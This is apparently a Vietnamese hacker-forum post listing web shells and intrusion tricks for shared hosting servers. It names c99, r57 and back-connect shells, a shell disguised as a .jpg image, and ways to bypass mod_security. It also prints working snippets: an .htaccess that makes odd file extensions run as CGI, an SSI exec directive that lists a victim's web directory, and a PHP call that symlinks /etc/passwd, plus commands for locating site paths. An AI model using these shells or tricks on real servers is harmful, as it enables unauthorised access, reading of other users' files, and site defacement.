Tổng hợp Tools Hacker


Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server
cgi.x-zone telnet 1.4
1.4.pl bypass mod sec (base64)
Telnet 1.3
tn.txt .htaccess
Options +FollowSymLinks+Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg
RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .***
AddType application/octet-stream .*** ~> 2 dòng cuối khi symljnk ghi vào file.*** thì file này load trên trình duyệt sẽ tự download về
Admin Finder (tìm thư mục admin)
cmd.shtml > view source cmd.shtml
<!--#exec cmd="dir /home/victim/public_html/" --> cmd.shtml (1.txt là file đã được symljnk) > view source cmd.shtml
<!--#include virtual='1.txt'--> Bypass ln.zip
system('./ln -s /etc/passwd > 1.txt');
?> hoặc
./ln -s /home/victim/public_html/index.php 1.txt File SymLink.php
/home/victim/public_html/index.php Find Path qua error-log : http://victim.com/****
tail -100 /var/log/httpd/domains/siteA.error.log | grep ****
tail -100 /usr/local/apache/logs/error_log | grep **** Shell offline.php?acc ~> get user admin ,nhiều chức năng ,kobị lổi trên các server config kỉ
offline.php Backuper.php (Leech code)
backuper.php Shell Unkonw (Brute)
unknow.php Shell images (r57)
love.php Shell images (Webadmin)
WebAdmin.php Shell Dumper.php (Zip + Restor data)
dumper.php Shell images aaa.php.jpg - shell upload
Free Cloud Storage - MediaFire Shell help.php (upload file + chmod)
help.rar Unzip.php (giải nén các file bị zip)
unzip.php.zip Con shell này tạo ra thêm 2 file đểthực hiện zip
Nếu ko tạo đc 2 file này thì chúngta sẽ tự tạo 2 file đó
info.php.zip telnet v1.3 (ko cần htaccess)
telnet.rar sym-pl.pl (symljnk cgi ko cần htaccess)
sym-pl.rar Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉsd 1 số sv)
root.php Locus Shell (back connect)
locus.php perl shell mr.thien (BackConnect)
mr.thien Mysqldumper.php (BackConnect)
mysqldump.php 5.2.9 (BYpass)
5.2.9.php dot.pl (tim user+domain)
dot.rar upload.phpl (upload len path)
upload.php shell.xml (prefix admincp)
ec.xml shell ,tạo file symljnk đối với từngversion php ,direct , h4ckcity.php
sql deface vbb,wp,mybb sql.php
html shell có thể view file bị permiss html.php
http://victim.com/html.php?http://ww...file=index.php shell python.php (chức năng tạo shell cgi,py,bypass,sql wp& jomla,....)
python.php hoặc
python.py shell sec4ever .qua mặt anti với code hoàn toàn # c99 & r57
windows-1256''sec4ever.rar vault.php (editor,webshell,bind)
vault.php saudi.php (symljnk root ,brute,...)
saudi.php sa2.0.php(resever,symljnk root,upload)
sa2.0.php madspotshell.php(symlink tung user)
madspotshell.php r57-vip.php symljnk

